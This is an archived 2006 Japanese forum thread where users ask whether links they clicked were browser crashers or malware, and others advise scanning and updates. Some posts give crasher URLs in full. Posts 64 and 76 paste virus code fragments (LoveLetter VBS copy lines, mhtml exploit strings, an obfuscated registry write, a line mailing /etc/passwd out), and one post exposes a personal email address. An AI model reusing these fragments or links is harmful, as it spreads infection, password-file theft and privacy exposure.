06/11/07 16:31:40
★質問時のお約束★
ウィスルやブラクラだと思われる物の直リンは厳禁!!!!!!!!!!
質問の時は頭の『ht』を抜いて貼り付ける事
あなたが踏んだあやしいリンクのURLは回答に必要な情報ですが
同時に凶器にも成り得ます。他の方が誤って踏まないよう注意しましょう
3:名無しさん@お腹いっぱい。
06/11/07 16:32:36
★よく出るブラクラ★
www.hellplant.org/cgi-bin/xoor/serpent.cgi
メディアプレーヤーやtelnetを起動
Outlookに変なニュースグループを作成
最後にIPを抜かれる
とりあえずPCに実害は無いので踏んだら再起動でおk
4:名無しさん@お腹いっぱい。
06/11/07 16:33:49
★最近よくある手口その1★
~画像リンクに見せかけて実はブラクラ~
例:up2.viploader.net/pic/src/viploader90786.jpg
(既に404です)
URL末尾がjpgでも油断してはいけません
こんなのはどうとでも書けます
IEは初期設定ではリンク先をファイルの内容に従って開くので
対象がhtmlなどであれば、ブラクラが炸裂する事も
5:名無しさん@お腹いっぱい。
06/11/07 16:34:20
★最近よくある手口その2★
~超巨大画像~
例:www.lbycwi.org/images/Logos/LBYC%20Burgee-w-text-huge.jpg
(危険。踏まないで下さい)
画像は画像ですが、それが度を越すと凶器にもなります
例の画像は解像度12000×6927を誇り、あなたのPCのメモリを強烈に消耗します
低スペックPCでは固まる原因になります
また、こういった画像がアップローダーなどで再利用される場合もあります
6:名無しさん@お腹いっぱい。
06/11/07 16:34:52
★最近よくある手口その3★
~ニュースサイト見せかけて実はブラクラ~
例:newsheadline.tripod.com/sports/20060928-00000025-san-fi.html
例:headline-news.tripod.com/national/20061028-000000112-asa-soc.html
(前スレより、現在は404)
URLは結局どうとでも書けるという事です
ブラクラ程度で済めばいいですが、中にはウイルスサイトに繋がっているなど
本当に悪質な物もあります。日頃からPCセキュリティに留意しましょう
最悪↓だけはやっておきましょう
WindowsUpdate
URLリンク(update.microsoft.com)
7:名無しさん@お腹いっぱい。
06/11/07 16:37:57
あなたが悪質なリンクを踏んでしまった時に
あなたのPC環境の情報が必要になる場合があります
その場合は以下の項目を記入してください
【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】
8:名無しさん@お腹いっぱい。
06/11/07 16:39:55
とりあえずこんな感じか
あやしい記述や不足分があれば指摘ヨロ
後は需要に任せる
9:名無しさん@お腹いっぱい。
06/11/07 19:51:18
乙カレさん ^^
10:名無しさん@お腹いっぱい。
06/11/08 10:58:06
スレ立て乙です
毎日、このスレを覗いてはブラクラURLをNG登録するのが日課です
11:名無しさん@お腹いっぱい。
06/11/09 13:54:08
乙
12:名無しさん@関西自慰協会会長
06/11/09 14:40:36
モツ
13:名無しさん@お腹いっぱい。
06/11/09 17:27:56
スレリンク(sec板)l50
精神的にかなり苦痛なのですが、対処法おねがいしまつ
14:名無しさん@お腹いっぱい。
06/11/09 17:59:05
どれが苦痛なのかな?
15:名無しさん@お腹いっぱい。
06/11/09 19:34:16
>>14
NODは確かにいいソフトで購入検討していましたが、あちらこちらに沸いたNOD厨のおかげで、
今ではNODと32という文字を見るだけで、寒気、めまい、吐き気を感じるようになってしまいました。
上記の文字を含んだスレタイはブラクラに値すると思います。
16:名無しさん@お腹いっぱい。
06/11/09 19:47:15
>>15 こちらで答えが見つかるのではないかと・・・
URLリンク(life7.2ch.net)
URLリンク(life7.2ch.net)
URLリンク(life7.2ch.net)
17:とにかくソフトを試しまくる人
06/11/09 20:14:15
>>15
そうですか、それはお気の毒に・・・
しかしながら大多数は、なんたちゃってNOD使いによる
NOD厨を装って嫌悪感を演出する低脳テクニック
を駆使するやからばかりなので、どうか考慮してあげて下さい。
あなたのご気分が、少しでも早く回復することを願っています。
18:名無しさん@お腹いっぱい。
06/11/09 20:23:21
物事は分けて考えようぜ。
NOD32という製品とその使用者は明確に分離されるべきである、と。
19:名無しさん@お腹いっぱい。
06/11/09 20:29:28
精神的ブラクラ対策のためにFirefoxのコンテンツ-画像設定で
例外設定にサイトをひとつずつ載せているのですが
urlをまとめてあるサイトとかないでしょうか?
20:名無しさん@お腹いっぱい。
06/11/10 19:41:40
URLリンク(headline-news.tripod.com)
おねがいしまつ
21:名無しさん@お腹いっぱい。
06/11/10 19:46:36
>>20 URLリンク(so.7walker.net)
22:名無しさん@お腹いっぱい。
06/11/10 20:00:12
>>20
>>6
有害無害含めて30種類の悪意あるサイトを呼び出すブラクラ
WindowsUpdate済みなら多分踏んで即感染は無い
一時ファイル削除して適当なウイルススキャンして何も出なければおk
23:名無しさん@お腹いっぱい。
06/11/10 20:11:38
>>21-22
ありがとうございます。アップデートはしてません。
PCがぶっ壊れました。携帯からのカキコです(泣
24:名無しさん@お腹いっぱい。
06/11/10 20:20:59
>>20
Java/ClassLoader.AA トロイ
JS/WindowBomb.G トロイ
Win32/TrojanDownloader.Small.NBQ トロイ
VBS/Redlof.M ウイルス
Win32/Exploit.WMF トロイ の亜種
Win32/AdInstaller
Win32/AdInstaller アプリケーションの亜種
など多数ありあり
25:好奇心怖い
06/11/10 20:47:16
URLリンク(www.c-games.net)
を踏んでしまいました。
キーロガーだ、パス抜かれた、垢ハックされたetc・・・と言われてて不安でたまりません。
不用意に踏んだ自分に非があるのは十分承知してます。
釣りだといいのですが、もし本当だとしたらどう対処すればよいのでしょうか?
26:名無しさん@お腹いっぱい。
06/11/10 20:58:36
>>25
踏んだだけではなんにも反応せん。
ただのはったりだな、それ。
27:名無しさん@お腹いっぱい。
06/11/10 21:02:05
>>25
>>26と同意見。とりあえずそのURLまでなら不審な点は見当たらない
28:名無しさん@お腹いっぱい。
06/11/10 21:08:42
>>25
そのURL、さらにその先も色々踏んだがなにも無し。
なんなら自分で再度踏んでみればわかる。 ^^
29:名無しさん@お腹いっぱい。
06/11/10 21:11:29
>>25は何でこのスレに持ち込んだのだろう
30:好奇心怖い
06/11/10 21:14:09
>>26>>27>>28
感謝します。
31:名無しさん@お腹いっぱい。
06/11/10 21:31:48
>>29
そりゃ怖がりだからさ、おk?
32:名無しさん@お腹いっぱい。
06/11/10 21:32:19
>>30
^^
33:名無しさん@お腹いっぱい。
06/11/12 14:10:47
あ
34:名無しさん@お腹いっぱい。
06/11/12 16:39:15
トミヤアパレル株式会社
URLリンク(www.tomiya-ap.com)
IMON ファイル URLリンク(www.tomiya-ap.com) Win32/Nachi.B ワーム 切断されました
35:名無しさん@お腹いっぱい。
06/11/16 19:35:15
URLリンク(headline-news.tripod.com)
踏んでしまいました・・・
初心者の自分にはいい勉強になった・・・
36:エロ好きな質問者
06/11/16 19:57:36
踏んでしまいました。
どこへ行けば解決できますか。
IE6
スレイプ
URLリンク(strange.kir.jp)
開き続けています。
37:名無しさん@お腹いっぱい。
06/11/16 19:58:43
>>35
何事も経験経験。ところでリンクを貼るときはhを抜いてね。特にやばめのリンクは。
38:名無しさん@お腹いっぱい。
06/11/16 20:13:11
踏んでしまってEXPL_WMF GENというのにかかってしまったんですが
どんなウイルスなんですか?
39:名無しさん@お腹いっぱい。
06/11/16 20:15:40
URLリンク(headline-news.tripod.com)
踏んじゃった。
以前からあるURLらしいけど、どーだろ。
とりあえずspybotとAd-AwareSEでスキャン&削除したけど
まだなんかした方がいいかな
40:名無しさん@お腹いっぱい。
06/11/16 20:36:22
>>39
>とりあえずspybotとAd-AwareSEでスキャン&削除したけど
新種のウィルスやトロイが入ってたらやっかいなので
カスペルスキーのオンラインスキャンぐらいおれはやるけどな
41:名無しさん@お腹いっぱい。
06/11/16 20:38:17
>>38
ぐぐるくせをつけるべし
URLリンク(www.trendmicro.co.jp)
42:38
06/11/16 20:55:00
>>41
ありがとうございました
43:エロ好きな質問者
06/11/16 22:39:58
ブラクラじゃないかも知れません。
ポップアップブロック有効にしてた気がします。
「既定のメールクライアントが正しくインストールされていないため
この操作を行えませんでした。」のウィンドウが開きます。
消しても、消しても、同じウィンドウが開きます。
このタブだけ消せれたらよいのですが。
ヤバイと思ってF4押したけど、時すでに遅しでした。
今、スレイプは操作を受け付けない状態です。
44:名無しさん@お腹いっぱい。
06/11/16 23:16:22
>>39
自分もこれ踏んじゃったのですけど
踏む
↓
一時ファイル消去
↓
インストしてるAVGでウィルススキャンするも反応なし
↓
カスペルスキーでオンラインウィルススキャン
-----
スキャンの統計
スキャンしたオブジェクトの総数 71143
検知されたウイルス 1
感染したオブジェクト 0
疑わしいオブジェクト 6
感染オブジェクト名 ウイルス名 前回の処理
C:\Documents and Settings\***\My Documents\Jane Style\Logs\*** 疑わしい: Exploit.HTML.Mht
上記のような2chのログが6つ検出
-----
↓
シマンテックのオンラインウィルススキャンでも
2chログの誤検出のみ
って状況でした
最後にシステムの復元をして通常利用に戻ろうと思うのですが
大丈夫でしょうか?今のところ特に以前と変わった点はありません
一応こまめにアップデートしてるのが功を奏したのかな・・・と思ってるんですが
45:名無しさん@お腹いっぱい。
06/11/16 23:26:08
>>44
問題なす
46:名無しさん@お腹いっぱい。
06/11/17 00:00:15
>>43
>36はDr.Web R ? onlineでExploit.WinCrashとでたよ
タスクマネージャからプニル終了させたら
47:名無しさん@お腹いっぱい。
06/11/17 00:11:55
>>45
ありがとうございます
48:名無しさん@お腹いっぱい。
06/11/17 00:18:02
>>47
^^
49:名無しさん@お腹いっぱい。
06/11/17 00:57:25
OK。ブラクラくらったぜ 。
∧_∧
∧_∧ (´<_` ) 流石だよな俺ら。
( ´_ゝ`) / ⌒i
/ \ | |
/ / ̄ ̄ ̄ ̄/ |
__(__ニつ/ FMV / .| .|____
\/ / (u ⊃
 ̄ ̄ ̄ ̄ ̄
ガタガタガタタタタタ・・・・
50:エロ好きな質問者
06/11/17 03:31:21
>>46
ありがとうございました。
プラウザはあきらめるしかないのでしょうか。
51:名無しさん@お腹いっぱい。
06/11/17 03:45:32
>>50
>プラウザはあきらめるしかないのでしょうか。
意味がよくわかんない。
52:39
06/11/17 08:33:44
補足。一応バスター2007入ってます。
でも心配でspybotとAd-AwareSEでスキャン、更にセーフモードでもう一回Ad-AwareSE。
オススメのカペルスキーオンラインスキャンをやったら以下の結果
C:\Program Files\Live2ch\log\life7.2ch. (中略).dat 疑わしい:
C:\Program Files\Live2ch\log\music5.2ch. .dat 疑わしい:
C:\Program Files\Live2ch\log\news19.2ch. 5.dat 疑わしい:
C:\Program Files\Live2ch\log\news19.2ch.net dat 疑わしい:
C:\Program Files\Trend Micro\Virus Buster 2007\Quarantine\75D.tmp 疑わしい:
C:\Program Files\Trend Micro\Virus Buster 2007\Quarantine\Backup\meroharudoumei[1].RB0 感染: Virus.VBS.Redlof.a
バスターが感染ってどういうコト?
誤検出でイイのかな?
改めてバスターでスキャンしたらAd-Awareが誤検出されたし。
53:名無しさん@お腹いっぱい。
06/11/17 09:10:31
C:\Program Files\Live2ch\log\life7.2ch. (中略).dat 疑わしい:
C:\Program Files\Live2ch\log\music5.2ch. .dat 疑わしい:
C:\Program Files\Live2ch\log\news19.2ch. 5.dat 疑わしい:
C:\Program Files\Live2ch\log\news19.2ch.net dat 疑わしい:
たぶん2chに書き込まれたコードだろうけど、疑わしいと判定されてるなら
削除すればいいでしょ。 所詮2chのログだし。
バスターはわからん。
54:名無しさん@お腹いっぱい。
06/11/17 10:04:16
>>52
Quarantine = 隔離
バスターが隔離したウイルスにカスペが反応しているだけ
既にバスターが無害化したファイルだからそのままで問題無い
それでも気持ち悪いと思うなら隔離逝きになったファイルを削除してしまえばいい
55:39
06/11/17 10:30:52
>53 >54
ありがとうございました。
2chのログは削除済みです。
バスターはそのままで良いのですね、安心しました。
56:名無しさん@お腹いっぱい。
06/11/18 17:14:29
URLリンク(www5d.biglobe.ne.jp)
ここなんですが、踏んだらWinメディアプレイヤーが不正終了しました
何か問題があるURLか分かる方いませんか?
57:名無しさん@お腹いっぱい。
06/11/18 17:47:31
URLリンク(www.mayhem.net)
これ踏んじゃいました。ブラクラらしいのですが、なにも起こりません。
急に再発したりするんですかね?
58:名無しさん@お腹いっぱい。
06/11/18 17:56:33
>>56
「video/mpeg」を発見しました。(4.3 MB) SCOでは問題ないようです。
右クリックしてダウンロード再生してみては?
59:名無しさん@お腹いっぱい。
06/11/18 18:02:48
>>56
普通にみれたぜ。
浜崎のコンサートの一部だった。
60:名無しさん@お腹いっぱい。
06/11/18 18:04:34
>>57
ブラクラではありません。
ただ動画自体が揺れるのでくらくらします。
61:名無しさん@お腹いっぱい。
06/11/18 18:08:18
>>58-59
そうでしたか!ありがとうございます。
いま心配でMcafee走らせましたが、感染なしでした。
62:名無しさん@お腹いっぱい。
06/11/18 18:17:24
>>58
右クリックでダウンロードして観たら、ちゃんとみれました。
お騒がせいたしました。
63:59
06/11/18 18:20:16
>>61
Mcafeeで発見できないトロイなどがあるので
やばいと思ったらカスペルスキーのオンラインスキャンあたりで確認する方がいいよ。^^
by 元Mcafee使ってた人
p.s.
上のURLは問題ないので安心してほしい。^^
64:名無しさん@お腹いっぱい。
06/11/18 18:21:08
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
c.Copy(dirwin&"\Win32DLL.vbs <body onload=window()> c.Copy(dirsystem&"\MSKernel32.vbs
ms-its:mhtml:file://C:\
65:名無しさん@お腹いっぱい。
06/11/18 18:21:43
O16 - DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml:file://c:\nosuch.mht!
66:56
06/11/18 18:25:27
>>63
ご丁寧にありがとうございます。
重ねてお礼いたします。
67:名無しさん@お腹いっぱい。
06/11/18 18:26:39
>>66
^^
68:名無しさん@お腹いっぱい。
06/11/20 16:09:25
URLリンク(jp.drivecleaner.com)
日本向けに作られたサイトみたいです。
一種のブラクラと思いますが、鑑定お願いします。
69:名無しさん@お腹いっぱい。
06/11/20 16:15:04
>>68
インチキソフトサイト
騙されてダウンロード・実行しなければ特段害は無い
関連スレ
WinAntiVirus-詐欺ソフト対策総合スレ-SystemDoctor
スレリンク(sec板)
70:68です
06/11/20 17:58:39
>>69
ありがとうございます。
YouTubeの動画観てたら、いきなり「Drivecleaner」に飛ばされました。
表記の日本語がおかしく、閉じてもまた出てくるのでタスクで強制終了いたしました。
勉強不足でした<(_ _)>
失礼ですが、こちらのスレッド開くたびにノートン先生反応するのですが、自分だけ!?
なにやら 「HTTP MSIE JavaScript OnLoad Rte CodeExec」 の試みを検出して遮断しました とか、
Bloodhound.Exploit.6 (ウィルス)を検出、修復しましたって???
71:名無しさん@お腹いっぱい。
06/11/20 18:14:56
>>70
ノートンがウィルスコードに反応してるだけだよ。
それがノートンの弱点なのだよ、これが。
いい加減改良しろよスマンテック社。
72:名無しさん@お腹いっぱい。
06/11/21 03:35:37
URLリンク(headline-news.tripod.com)
踏んでしまいました。
Macでも何か問題が起こることはありますか?
73:名無しさん@お腹いっぱい。
06/11/21 04:26:22
>>72
tripod.com自体は単なるウェブホストサイトなのでそこまでなら無害
>>6のようにそれ以降の文字列が問題になる
ただ、今、tripod.comを踏むと>>69にある詐欺ソフトを薦められる場合がある
これを騙されて実行すると有害。macで動くかどうか分からんが
特に何も出なかったよ、というならそれも問題無し
74:名無しさん@お腹いっぱい。
06/11/21 05:35:51
>>72
macなら平気でしょたぶん。
心配ならばmac用のフリーソフトでチェックすればおkだと思うよ。
75:72
06/11/23 03:35:13
ありがとうございました。
安心しました。
76:名無しさん@お腹いっぱい。
06/11/23 03:39:20
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
c.Copy(dirwin&"\Win32DLL.vbs")
ms-its:mhtml:file://c:\
End Sub
これなんですか?
77:名無しさん@お腹いっぱい。
06/11/23 05:08:49
これが噂のノートントラップを引き起こすウィルスコードです・・・
釣られますた;
78:名無しさん@お腹いっぱい。
06/11/26 10:41:19
URLリンク(www.lbycwi.org)
79:名無しさん@お腹いっぱい。
06/11/26 13:47:52
URLリンク(www1.harenet.ne.jp)
これURLからしてブラクラだと思うんですが、どうなんでしょうか?
80:名無しさん@お腹いっぱい。
06/11/26 14:20:51
>>79
ブラ・・・・すれ違いです。本当にありがとうございry
81:125x101x126x234.ap125.ftth.ucom.ne.jp
06/12/01 10:16:05
あげ
82:名無しさん@お腹いっぱい。
06/12/04 00:46:02
URLリンク(www.geocities.com)
踏んだらウインドウがたくさん出てきてしまいました><
83:名無しさん@お腹いっぱい。
06/12/04 11:25:03
>>82
そこトロイも仕込まれるお
84:名無しさん@お腹いっぱい。
06/12/04 11:28:17
>>82
テルネットストームだね
85:名無しさん@お腹いっぱい。
06/12/05 03:08:09
かつてのソースチェッカーオンラインってサイト
URLリンク(7walker.com)
へアクセスしようとすると、ムハンマドとかHackedとか書かれた怪しいサイト
URLリンク(www.wolfsecurity.org)
へ飛ばされるようになったんですがここはヤヴァイサイトでしょうか・・
86:名無しさん@お腹いっぱい。
06/12/05 06:12:10
>>85
よくわからんがハッカー連中のホームページかな
とりあえず踏んで即何かを仕掛けられるというのは無いみたいだが
手口も思想的にもヤヴァイ連中かも知れん
奥に進むとブルートフォースとか置いてあるし
まぁ関わり合いにならん方がいいだろう
87:名無しさん@お腹いっぱい。
06/12/05 12:21:57
URLリンク(so.7walker.net)
こっちは?
88:名無しさん@お腹いっぱい。
06/12/05 12:40:36
>>87
ソースチェックサービスは利用可能だけど
普段ページ中心に据えられている更新履歴がごっそり無くなっている
やっぱ何かあったのかね
89:名無しさん@お腹いっぱい。
06/12/05 12:47:31
やられたっぽい
//www.7walker.com/のTOP
↓
hacked by cobra_21
90:名無しさん@お腹いっぱい。
06/12/05 13:12:17
トップページが書き換えられてしまっている
URLリンク(so.7walker.net)
91:名無しさん@お腹いっぱい。
06/12/05 13:23:39
どういうことなの?
92:名無しさん@お腹いっぱい。
06/12/05 13:27:20
Site Hacked by lord Chy
白・・・
93:名無しさん@お腹いっぱい。
06/12/05 15:09:48
>>90
そいつ、画像はやつらのサイトから取ってきてるから踏むとアクセスログ取られるかもよ。
94:名無しさん@お腹いっぱい。
06/12/05 17:07:56
他スレからモテキタ(^o^)
186 名前:猫△ワル男 ◆oKLssLV2YM [sage] 投稿日:2006/12/05(火) 16:45:04 ID:???
トップを食われちゃってますね 無差別攻撃かな
まあお忙しいとかおっしゃってましたので(公開コメントで)こんなこともあるんでしょう
全破壊を受けたわけではないようです 復旧まで、迂回路(?)を使いましょう
ただし、どんな地雷を埋められているかわからないので、
サイトの再インストール完了宣言までは、安全判定不可扱いです
URLリンク(so.7walker.net)
URLリンク(so.7walker.net)
95:名無しさん@お腹いっぱい。
06/12/05 19:47:10
クラッキング(ハッキング)されました。。。
どうやら
7walker.com
7walker.net
どちらのサイト共にやられたようです。
階層内もずたずたにされており、
危険なファイルがまぎれている場合があるので、
サイト内にアクセスする場合は気をつけてください。
あとソースチェッカーオンラインですが、
誠に勝手ながら休憩させていただきます。
なお復帰時期は未定です。
あらら。。。
96:名無しさん@お腹いっぱい。
06/12/05 19:49:27
さっき普通にチェックしたあともう一度チェックしたらその表示が出てきてワロタ
97:85
06/12/05 21:11:39
みなさんレスありがとうございました。 こーゆー事だったんですね。
Janeとかのコマンドに指定していつも確認してから観てたんですけど
自分ひとり変なページに飛ばされてたんで実況とかついていけなかっ
た...orz
98:名無しさん@お腹いっぱい。
06/12/05 23:25:52
ブラクラで検索かけてこのスレ来ました。
ソースチェッカーオンラインをいつも利用していたのですが
なんか攻撃されたとかで>>94-95ですね
復帰時期が未定とのことなので代わりになるサイトを探しています
どこかおすすめのところはありますか?
専ブラから飛んでいけるサイトを探しています
(専ブラを利用しているので専ブラで知りたいサイトのURLをクリックして飛んでいく)
99:名無しさん@お腹いっぱい。
06/12/06 00:52:55
>>98
URLリンク(www.kakiko.com)
これはどうかな?
100:名無しさん@お腹いっぱい。
06/12/06 00:53:46
とりあえずview-source:かね。 SP2は同等品とかで
101:名無しさん@お腹いっぱい。
06/12/06 06:43:11
>>98
URLリンク(rd.or.tp)
102:名無しさん@お腹いっぱい。
06/12/07 23:38:19
"Hacked by" "Site hacked"でググルと哀れなサイトが結構出てきてウケル。
103:名無しさん@お腹いっぱい。
06/12/07 23:39:09
おっと、ヒットしても踏むときは自己責任でなw
104:名無しさん@お腹いっぱい。
06/12/08 15:54:01
ki143.opt2.point.ne.jp
222.225.95.143
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 222.225.0.0/16
b. [ネットワーク名] TEPCO-HIKARI
f. [組織名] 株式会社ドリーム・トレイン・インターネット
g. [Organization] DREAM TRAIN INTERNET,Inc.
m. [管理者連絡窓口] MH4804JP
n. [技術連絡担当者] MH4804JP
p. [ネームサーバ] ns.dti.ad.jp
p. [ネームサーバ] ns2.dti.ad.jp
[割当年月日] 2005/07/22
[最終更新] 2006/08/31 11:44:09(JST)
上位情報
----------
KDDI 株式会社 (KDDI Corporation)
[割り振り] 222.225.0.0/16
105:名無しさん@お腹いっぱい。
06/12/09 23:38:21
kengo.physical0816@ezweb.ne.jp
106:名無しさん@お腹いっぱい。
06/12/14 09:22:09
先日他所で>>3のブラクラを踏んでしまいました。
接続はすぐに切ったんですが、自分なりに調べてみたらADSL以外の環境では
国際電話やQ2に繋がってしまうと書いてありました。
自分はカード型PHSで接続しているので、料金がかかる可能性が高いんでしょうか?
>>3には実害は無いと書いてありますが、どうなんでしょう?
自分の責任なのはわかっていますが、良かったら教えてください。
107:名無しさん@お腹いっぱい。
06/12/14 19:50:17
ダイアルのプロパティをみて番号が正規のプロバイダになっているか確認せよ
108:名無しさん@お腹いっぱい。
06/12/15 05:57:32
>>107
レスありがとうございます
カード型PHSのダイヤル先を確認してみたんですが、元のプロバイダの電話番号でした。
この場合、今現在は大丈夫と考えてよいのでしょうか?
また、ブラクラを踏んだ時点で課金されている可能性はありますよね?
109:名無しさん@お腹いっぱい。
06/12/15 10:41:34
PHS以外の接続設定が出来てたら繋がった可能性はある。
>カード型PHSで接続しているので
willcomなら注意事項を読んでこれ申し込んどけ
URLリンク(www.willcom-inc.com)
>また、ブラクラを踏んだ時点で課金されている可能性はありますよね?
質問の意味がわからない
110:名無しさん@お腹いっぱい。
06/12/15 23:51:05
>>82
これを踏んでVB2007が反応し窓がたくさんでてきてやばいと思ったので
再起動
LANケーブルをはずしウィルスチェックかけるとウィルスが検出され
隔離されたとの報告
気持ち悪いのでバックアップソフト(HDD革命)でシステムドライブを
一週間前の状態に戻した
他のドライブに影響出てないといいが
というか初めてウィルス踏んだ・・orz
111:名無しさん@お腹いっぱい。
06/12/16 00:08:49
>>110
今はバスター使ってないからわからんが
検出されたのはこれじゃないのか
URLリンク(www.trendmicro.co.jp)
ブラクラを起こすスクリプトを便宜上ウイルス扱いしているだけで
システム破壊や感染活動は行わない
踏んだ時に一回発動してそれっきりのはず
>ウィルスチェックかけるとウィルスが検出され
一時ファイルに該当のjsが残っていたのだと思うけど
対処法としては放置か、気になるなら一時ファイル削除して再起動すれば十分
わざわざ復元措置をするほどの、大層な代物では無い
別にまぁ、気持ち悪いから戻す、というのも精神衛生の面で十分な理由ではあると思うけどね
112:名無しさん@お腹いっぱい。
06/12/16 00:13:37
>>111
そのウィルスです
あまり危険じゃないのですね安心しました
113:名無しさん@お腹いっぱい。
06/12/16 02:49:43
URLリンク(headline-news.tripod.com)
これ踏んでやられました。
対処法を教えてください。
IEが開きません
114:名無しさん@お腹いっぱい。
06/12/16 03:15:08
>>6-7
115:名無しさん@お腹いっぱい。
06/12/16 03:25:53
【使用OS】
windows xp
【WindowsUpdateしてるか】
最近していない
【AntiVirusは何を使っているか】
ノートン
【ちゃんとUpdateしてるか】
していない
【スキャンした結果(ウイルス名・発見場所)
2ちゃん内
【別のオンラインスキャンしたならその結果は】
ウイルスを発見、削除できません。
【症状を具体的に、分かる限りすべて書く】
IEが開かない。エラーとでる
【何をしたらそんなことになったのか】
2チャン内のURLふみました
【これまでにとった措置】
テンポラリー内削除
【その他の質問】
PC買い替えになるのでしょうか?
116:名無しさん@お腹いっぱい。
06/12/16 14:04:08
>>109
ありがとうございます。
それは便利ですね。すぐにでも登録します。
下部の文は、あのブラクラを踏んでから接続を切るまでの間に
Q2に繋がれていた可能性はあるかって事です。
日本語ヘタですみません。
117:名無しさん@お腹いっぱい。
06/12/16 18:35:37
>>115
ウイルス名は?
118:名無しさん@お腹いっぱい。
06/12/17 02:39:54
>>116
109ではないが。Q2やらに接続されていた可能性はないとはいえないが、低い。
気になるのなら電話会社で通話明細を確認してみた方がいいと思う。
Q2はNTTのサービスなのでNTT以外の会社からつながったのかな?試しにどこかのQ2にかけてみれば?
119:名無しさん@お腹いっぱい。
06/12/17 02:44:52
>>115
PCのダメージ少ないなら、ウイルス駆除→IE再インスコで治るかも。だめだったらOSを再インスコまたはシステムリカバリーディスクを使用。
買い換える必要はないだろ。
120:名無しさん@お腹いっぱい。
06/12/17 13:27:42
URLリンク(www.hellplant.org)
これ踏んじゃったんだけど、これ貼った奴訴えても良い?
121:名無しさん@お腹いっぱい。
06/12/17 13:30:46
>>120
くだらねえ。
やめとけ。
mmsとか使ってプロクシを回避、IPアドレスを抜くやつだ。
ブラクラでも何でもねえ。
122:名無しさん@お腹いっぱい。
06/12/17 13:38:07
>>121
URLリンク(www.hellplant.org)
のアドレスをクリックすることで、ブラウザクラッシャーという悪質ないたずらが発生する。
無制限にさまざまなプログラムが起動し、CPUやメモリの許容範囲を超えるような作動をし、
フリーズし、強大な負荷により、ハードディスクが破損する恐れもあるという。
そして、最後には、ダイアルアップ回線などの回線をtelnetという回線に移行させ、国際回線などの
高額な料金を請求されてしまう。
プロバイダに確認したところ、CATVやADSLや光ファイバーではtelnetによって回線を勝手に変えられることはないようだが、不確定なので注意すべきだ。
この掲示板でも、なんどもこのアドレスを偽装して踏ませようとする悪質な罠を作成する陰湿な者がいるので注意してほしい。
って書いてあるんだけど、じゃあ害は無いの?
123:名無しさん@お腹いっぱい。
06/12/17 13:43:00
本質はブラクラじゃねえよ。
ブラクラっぽい動作をするだけだ。
本質はIPアドレスの表示。
124:名無しさん@お腹いっぱい。
06/12/17 13:54:32
>>123
じゃあ対策は要らないんですか?
125:名無しさん@お腹いっぱい。
06/12/17 14:29:30
俺も別の板のスレで>>120踏んでしまった。
ノートンがブロックしてくれたような気がするけど、ヤバいかな。
とりあえずスパイウェアチェックとウイルスチェックしてこよう
126:名無しさん@お腹いっぱい。
06/12/17 14:36:47
>>122
>最後には、ダイアルアップ回線などの回線をtelnetという回線に移行させ、国際回線などの
高額な料金を請求されてしまう。
Telnetクライアントでググってみろ
ダイヤルアップなんかと全然関係ねえよw
127:名無しさん@お腹いっぱい。
06/12/17 14:42:57
一例としてWindows98からUNIXのサーバーを利用する場合を示すと、上記で起動したTelnetクライアントの「接続」メニューの
「リモートシステム」を選択し、「ホスト名」に相手のサーバーのIPアドレスかホスト名を入力するとサーバーに接続され、
「login」名と「Password」の入力が求められるので、正しく入力すると使用できるようになる。
128:名無しさん@お腹いっぱい。
06/12/17 14:50:17
俺なんてその手のブラクラ10000回は踏んでるなw
tskill iexploreでいつも強制終了させてるわさww
129:名無しさん@お腹いっぱい。
06/12/17 14:51:33
訴えるも何も自分が危険URLをここに貼ってるじゃん
130:名無しさん@お腹いっぱい。
06/12/17 14:52:14
url
IPが抜けませんでしたっ
www.hellplant.org/cgi-bin/xoor/serpent.cgi - 2006年12月16日 - このサイト内で検索
131:名無しさん@お腹いっぱい。
06/12/17 15:00:01
そもそもが一般人にTelnet.exeなんて必要ねえじゃねえかよ
ファイアーウォールで外向けをブロックしちまえよw
それと、それらの相手先のTelnetサーバーは応答なんてして来ねえよ
132:名無しさん@お腹いっぱい。
06/12/17 15:16:13
>>119
ウイルス駆除ってww
その方法を記載しろよ・・・
133:名無しさん@お腹いっぱい。
06/12/17 15:30:20
感染したって言ってるウィルス名も分からないのにどうアドバイスしろと・・・
134:名無しさん@お腹いっぱい。
06/12/17 15:31:03
>>133
つクリーンインスコ
135:名無しさん@お腹いっぱい。
06/12/17 16:39:41
>>118
さすがに自爆はできないですw
でも不安だったら確認してみるよ。ありがとう。
136:125
06/12/17 20:32:49
とりあえずspybotのスパイウェア検索とノートンの完全スキャンをしたけど検出0だった。
あとはTelnetの遮断をした。
無知な俺に出来る事はこれくらいか・・・
137:名無しさん@お腹いっぱい。
06/12/17 21:26:48
>>136
>ノートンの完全
他社のオンラインスキャンを併用しておいたほうが吉
URLリンク(www.kaspersky.co.jp)
by ノートン2007使い
138:136
06/12/17 22:11:27
>>137
㌧。やってみるよ。
139:名無しさん@お腹いっぱい。
06/12/18 00:25:29
セキュリティ初心者質問スレッドpart79
スレリンク(sec板)
140:名無しさん@お腹いっぱい。
06/12/18 21:06:57
【使用OS】 XP
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 VBとAVG
【ちゃんとUpdateしてるか】 してます
【スキャンした結果(ウイルス名・発見場所)】
AVG→IE一時ファイルにJS/Psyme.Cというトロイ
